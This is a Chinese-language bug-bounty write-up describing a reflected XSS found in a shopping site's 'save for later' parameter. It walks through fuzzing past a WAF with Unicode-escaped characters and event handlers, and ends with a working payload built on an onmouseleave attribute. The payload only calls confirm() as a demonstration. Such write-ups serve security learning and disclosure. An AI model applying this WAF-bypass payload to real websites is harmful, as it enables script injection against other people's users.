社区首页 >专栏 >BUG赏金 | Unicode与WAF—XSS WAF绕过

BUG赏金 | Unicode与WAF—XSS WAF绕过

Timeline Sec

发布于 2019-12-23 03:22:14

1.9K00

代码可运行

文章被收录于专栏：Timeline SecTimeline Sec

运行总次数：0

代码可运行

图片来源于网络

通过标题，您可能会知道这是有关使用UNICODE进行 XSS WAF绕过的文章。因此，让我们给你一个关于我正在测试的应用程序的小想法。有一个名为“以后保存” 的选项，该选项将项目保存在您的帐户中以备后用。该请求看起来像：

如果用户进行了正确的身份验证，则此发布请求会将项目保存在用户帐户中，以供以后使用；如果用户未进行正确的身份验证，则该请求仅会返回一些值。因此，我在参数上进行黑盒测试，并注意到传递的参数值在响应主体中得到返回，而在经过身份验证和未经身份验证的场景中都没有适当的转义。我发送了一个如下的参数值：

xss \"><

返回的结果如下：

<a class="link nc-text-regular nc-blue js-movetocart" data-giftitemid="<ID>" data-skuid="<ID>" data-itemnumber="<ID>"
         data-productid="<ID>" data-channel="xss"><" data-quantity="1"
         data-isbundleitem="false" role="link" tabindex="0" aria-label="label">Move to cart</a>

我们输入的值在<a>标记内，由于引号和小于/大于-符号未正确过滤，因此我们可以跳出该值。因此，我认为我有很多方法可以在这里进行XSS，直到我输入 xss \” onclick = \“ alert（1）并且响应为：

因此，存在WAF。为了绕开它，我开始模糊测试，结果是：

xss \" onclick= \" alert(1)    ==> WAF
xss \" xss = \" alert(1)       ==> WAF
xss \" xss = \" xxx(1)         ==> 没有WAF

因此，我尝试创建一个标签，而不是在<a>标签中添加事件属性，然后输入xss \”> <xss> test，响应为：

<a class="link nc-text-regular nc-blue js-movetocart" data-giftitemid="<ID>" data-skuid ="<ID>" data-itemnumber ="<ID>"
          data-productid ="<ID>" data-channel =" xss">test" data-quantity =" 1"
          data-isbundleitem ="false" role ="link" tabindex ="0" aria-label="label">移至购物车</a>

因此，它还删除了看起来像tag的上下文。因此，我们没有创建标签的优势。因此，我们唯一的方法是绕过WAF 在<a>标记中使用事件属性。我尝试通过fuzzdb使用html-event-attributes.txt 进行暴力破解。以看看是否有事件没有被WAF阻止然而并没有什么有值得关注的。

然后我考虑了一下进行unicode编码，输入了一个随机的unicode看看它在响应中是否解码。值得庆幸的是它将unicode解码成它的原始的字符。所以现在我再次开始使用unicode + events的形式，结果是：

 xss \" \u003E\u003Cxss\u003Etest"             ==> xss"> <xss> test"
 xss \" xss = \"co\u006efirm(domain)"          ==> 没有WAF 
 xss \" onc\u006Cick = \"co\u006efirm(domain)" ==> HTTP / 1.1 403禁止

所以我们现在有了新的有利条件，同样也有了新的问题。

有利条件是我们现在可以使用unicode创建HTML标签。

问题是我们添加onc\u006Cick事件会收到一个新的错误 HTTP / 1.1 403 Forbidden。

因此，我再次通过html-event-attributes.txt + Unicode制作了一个单词表，并得到了onmous\u0045leave和ond\u0072ag事件返回了 HTTP / 1.1 200 OK。同样我们还可以创建HTML标签。所以我得到了最后的有效载荷：

xss\"\u003E\u003Ch1 onmous\u0045leave=co\u006efirm(domain)\u003Ecome to me\u003C/h1\u003E\u003Cbr\u003E\u003C!--

响应主体是：

<a class="link nc-text-regular nc-blue js-movetocart" data-giftitemid="<ID>" data-skuid="<ID>" data-itemnumber="<ID>"           
          data-productid="<ID>" data-channel="xss"> <h1 onmouseleave=confirm(domain)>come to me</h1> <br> <!--" data-quantity ="1" 
          data-isbundleitem ="false" role ="link" tabindex ="0" aria-label ="label">移至购物车</a>